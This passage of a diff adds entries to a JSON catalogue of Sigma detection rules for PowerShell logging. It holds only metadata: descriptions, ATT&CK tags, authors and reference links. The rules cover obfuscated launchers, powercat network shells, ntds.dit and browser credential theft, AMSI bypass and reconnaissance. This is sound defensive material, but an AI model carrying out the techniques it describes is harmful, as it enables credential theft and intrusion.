"posh_pm_decompress_commands.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", + "value": "Suspicious Get-ADDBAccount Usage", + "meta": { + "refs": [ + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/03/16", + "filename": "posh_pm_get_addbaccount.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "value": "PowerShell Get Clipboard", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2020/05/02", + "filename": "posh_pm_get_clipboard.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "posh_pm_invoke_obfuscation_clip.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "uuid": "2f211361-7dce-442d-b78a-c04039677378", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/11/08", + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "posh_pm_invoke_obfuscation_stdin.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "posh_pm_invoke_obfuscation_var.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "posh_pm_invoke_obfuscation_via_compress.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "value": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/08", + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/08", + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "posh_pm_invoke_obfuscation_via_var.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", + "value": "Netcat The Powershell Version - PowerShell Module", + "meta": { + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ], + "creation_date": "2021/07/21", + "filename": "posh_pm_powercat.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote PowerShell sessions", + "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "value": "Remote PowerShell Session (PS Module)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2019/08/10", + "filename": "posh_pm_remote_powershell_session.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "level": "high", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/15", + "filename": "posh_pm_susp_ad_group_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/13", + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell download command", + "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "value": "Suspicious PowerShell Download - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_pm_susp_download.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "value": "Use Get-NetTCPConnection - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2021/12/10", + "filename": "posh_pm_susp_get_nettcpconnection.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/12", + "filename": "posh_pm_susp_invocation_generic.yml", + "author": "Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_pm_susp_invocation_specific.yml", + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", + "value": "Suspicious Get Local Groups Information", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/12", + "filename": "posh_pm_susp_local_group_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "uuid": "e3818659-5016-4811-a73c-dde4679169d2", + "value": "Suspicious Computer Machine Password by PowerShell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2022/02/21", + "filename": "posh_pm_susp_reset_computermachinepassword.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "uuid": "6942bd25-5970-40ab-af49-944247103358", + "value": "Suspicious Get Information for SMB Share - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/15", + "filename": "posh_pm_susp_smb_share_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ], + "creation_date": "2021/07/20", + "filename": "posh_pm_susp_zip_compress.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/05", + "filename": "posh_pm_syncappvpublishingserver_exe.yml", + "author": "Ensar \u015eamil, @sblmsrsn, OSCD Community", + "level": "medium", + "falsepositive": [ + "App-V clients" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detecting use WinAPI Functions in PowerShell", + "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", + "value": "Accessing WinAPI in PowerShell", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ], + "creation_date": "2020/10/06", + "filename": "posh_ps_accessing_win_api.yml", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", + "value": "Access to Browser Login Data", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ], + "creation_date": "2022/01/30", + "filename": "posh_ps_access_to_browser_login_data.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", + "value": "Powershell Add Name Resolution Policy Table Rule", + "meta": { + "refs": [ + "https://twitter.com/NathanMcNulty/status/1569497348841287681", + "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ], + "creation_date": "2021/09/14", + "filename": "posh_ps_add_dnsclient_rule.yml", + "author": "Borna Talebi", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "value": "PowerShell ADRecon Execution", + "meta": { + "refs": [ + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/07/16", + "filename": "posh_ps_adrecon_execution.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "value": "AMSI Bypass Pattern Assembly GetType", + "meta": { + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ], + "creation_date": "2022/11/09", + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "value": "Silence.EDA Detection", + "meta": { + "refs": [ + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" + ], + "creation_date": "2019/11/01", + "filename": "posh_ps_apt_silence_eda.yml", + "author": "Alina Stepchenkova, Group-IB, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", + "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "value": "Get-ADUser Enumeration Using UserAccountControl Flags", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", + "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_as_rep_roasting.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "value": "Automated Collection Command PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ], + "creation_date": "2021/07/28", + "filename": "posh_ps_automated_collection.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound", + "uuid": "83083ac6-1816-4e76-97d7-59af9a9ae46e", + "value": "AzureHound PowerShell Commands", + "meta": { + "refs": [ + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069" + ], + "creation_date": "2021/10/23", + "filename": "posh_ps_azurehound_commands.yml", + "author": "Austin Songer (@austinsonger)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", + "value": "Windows Screen Capture with CopyFromScreen", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_capture_screenshots.yml", + "author": 